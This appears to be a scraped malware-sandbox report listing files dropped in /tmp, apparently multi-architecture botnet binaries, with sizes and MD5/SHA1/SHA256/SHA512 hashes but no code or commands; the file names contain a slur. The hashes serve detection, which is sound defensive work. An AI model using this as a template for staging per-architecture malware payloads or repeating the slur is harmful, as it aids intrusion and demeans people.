3e2dfcd9b129e9502ef854f7451f7299812036ba

SHA256
cdd7d9565af3469b9a821239429b637797480fdc5e7f42095b948da44fe47921

SHA512
e9e5db39f798746dd16435db13548964d6e71f3002fb6123e7f0f3436c8f340a394701acf87b00bcce9c5176e89c0d46bf33ca51184d78ad7928a77cdff91d3c

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm

Filesize
29KB

MD5
ca3ed843f4289de112cfc3a9de2ce220

SHA1
fd52c7ca778a49fa52fd40eae34bbd6129609c44

SHA256
23c0d23f740c158abb9219f03832792056aa592faa7b7ab363dec0b8d00bd690

SHA512
1ac6db8d700bf61304541d8cb03e1a38475d70baa87c8b7287740359e67d17b0c1178050c6a907d52efa23edc49355dcb94e5817343a0ab8af2b616d67601d2c

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm5

Filesize
26KB

MD5
0c5f7f358e2283013858bcf22f812c41

SHA1
e98c0819df578b50d73189529ef995664db3ef85

SHA256
7377eedc36395600fb8c490c9f227e6471da8672ee042a92127119ed948bc6b4

SHA512
3185b997a393ec180d76f9d896c6a8d68143b3edd85b5794dcadb9aa0046fe23ecbc44c82e2545fab5b28c77b8651383c42c8b8f03a6b4f31ab7f68515957729

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm6

Filesize
34KB

MD5
b4421c007b6ee01b53296d6eb2c1d43e

SHA1
20c3f4d919a40e6bd50db26e9262a14ff6c116bf

SHA256
ee3793b2f7e994ae3c54f6932321c37c100b8253aedc64521b9b61e711f3a927

SHA512
fa401663d9d7fd9f0648ca6dd00567325616ecad9f261b8964d0923b5fba0d87613ef6a2f3be867de47ba6d6a36ac08d4ab6b814be68a78a44b4f3e0e8f98ea3

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm7

Filesize
54KB

MD5
2ed2993bc6391b0f0637a13e36eaf54a

SHA1
0c8288bc63885aa31a99ca03cebf26db686928d4

SHA256
025adeffba90479e24082201ad61376ce1d6473267a94a6901fea405ae557196

SHA512
0b320bd4dd81e8a1a9669bf6be1f34ec66794126a8ea34ab15904fe848a77549b60bc44650cdbd1e986108757c2ed8a31cc588207be392e78211fae44a2763a1

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i468

Filesize
250B

MD5
b32e06510115090646e59678f1583ff8

SHA1
34a0f3de9eae2379c20ca6c0681d513e100a0fb9

SHA256
c8e94d7c390d5b8077a811d03aa72e21ca8f3cb740e111349dc75fb056984258

SHA512
1841bb5a14b6390a4c4b8e5db61be9eb62766877d39161f4a385c957508ebce83355b9d3e3fef300b17cb216d7f00da06b06beeb9bc273adb58996db9b5fe432

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i686

Filesize
31KB

MD5
fbc0418c5814b38ea0700dd88bcaa9a3

SHA1
9890e3e3e8428a490404f3c037b3a4440cd98c0d

SHA256
6180a72b71fd89c5aa94c451434ae2bce4ab8e47b746105345542ffb4ceec762

SHA512
5f9c6048e39e9f7cc9c91e52097e0762e991d40952a467783e7ad17d4704a6f92de9d89334c30a3471b2c3e4f502a331c0ffb55435fa95afb12c5eb27b5eb63a

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_m68k

Filesize
78KB

MD5
05d0a11ee3eec95d52020d3ea7043190

SHA1
0b883c852c8f2f5ca6578f1149825db5b7133f99

SHA256
2a6a481a98d3cb6268a2b50127c620635ac861c13e337ae8d32891f7cc0273f6

SHA512
5b682f805902bea795e67d181755dcac1feb41bee8284fef35a812a43a1386d0f4d31aad685926cb9b8053c8f2468158e87723f727ef352d706a7c5d3b19b0c4

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips

Filesize
31KB

MD5
21165b8b4e986efc031cd41016dde6b6

SHA1
39ce8fe9071745d8f2f5493b243376dbd5418a36

SHA256
a61b712082a6c62842aa60f98806b2daf292a54119ae5f4d422fee3239fc5c86

SHA512
96a0d5ee860f38716f07780d9b47949851f6cc8284d17278d0a432b36a1dfd879966c160abb43ef294bfd6047504f84019ae51639f8ede3e00ab76502671c0ed

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl

Filesize
32KB

MD5
4e23210e2603fe08846bf7eeebd8aab5

SHA1
b6f6949d7c9da505946a90bbb8cca46a4c3efd53

SHA256
cd510f2661e5d81afed3093967ef5c31f1a14967a0e88b2b005549695653eaaa

SHA512
9f3d48b2744fa1d3b489fcec2d1dd2b1ecf74f3ae47d38cc0b424a10b20f69ce1c61809426f0f58068dcf902fcaeb815dee465b9b2c8512973d3e4cbbfe4a2d8

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_ppc

Filesize
28KB

MD5
1b794331eb6236353c7d51858ecd53dd

SHA1
71106443d803b7fe26a4f6e8736633640161f752

SHA256
145703e2f00273f3e3662a4c898e3598d673fb55e143123108bf34e75c859cd8

SHA512
55aa44900c9d87f209dbec55a84a08e2a8cbaa07a0a2a98a51436efdd005a1b53b0d0d449ae07af90021defdeeb8367b75fea4a87eb3037a149a262eb698b1f9

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_sh4

Filesize
72KB

MD5
ee355aa3b8684b094bbf5bc7bcfadbd2

SHA1
12b11845bd4d7796d7e84dd2ff26adfdf8a10e98

SHA256
d376e546be0d58750186d17526a85b95466ca285c6df404cb09d583a254f6c5a

SHA512
d7c282e6bed479e9698da141082fc1aa538f062addc2782aba72a565dc79207f057b92bb0cd730b453cef3610c1e8f27247ac853961c10bb565e71739fd266dc

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_spc

Filesize
81KB

MD5
030f3b9cf5a4d91999ac1cb627771aee

SHA1
f4ab0fcf14f94b3ca9f718eca5ff5a18f11f9ab7

SHA256
4a46d6b0b9115beddecd18b09c15275e12c8b2d06aa0e48bf087d0dbec80df43

SHA512
aa566dade2d65bcee5a469dae04b1864947abd8404b98cba2d6f8cb3dc70dea6ebad13e18a67c63c71b77b50a38e494d49a46fd258013cb15cad63f5c82ea8a1

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86

Filesize
29KB

MD5
545dbe1d228295c958b5a3f6ec4d8278

SHA1
f8dff366ea07681be596cdb33911c3f4119d0763

SHA256
a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b

SHA512
fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64

Filesize
31KB

MD5
709b104e746f24f3b18f7a1118c18bf0

SHA1
c1735eb637560a097d7a451601bb9ca2e8706e21

SHA256
abbd8780d40c95322f51410e0c77e22f3cb85a1e820ce62c604d3237c24089f1

SHA512
25d982fa5382a5ca8ad6820bb4021763c25bbe8ebc414043ade122529c0b1adcc10cd8fe6caa0b5ad5a4b97d9cfc80d0a15338e7422b2604dc2ecab88fcbba34

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads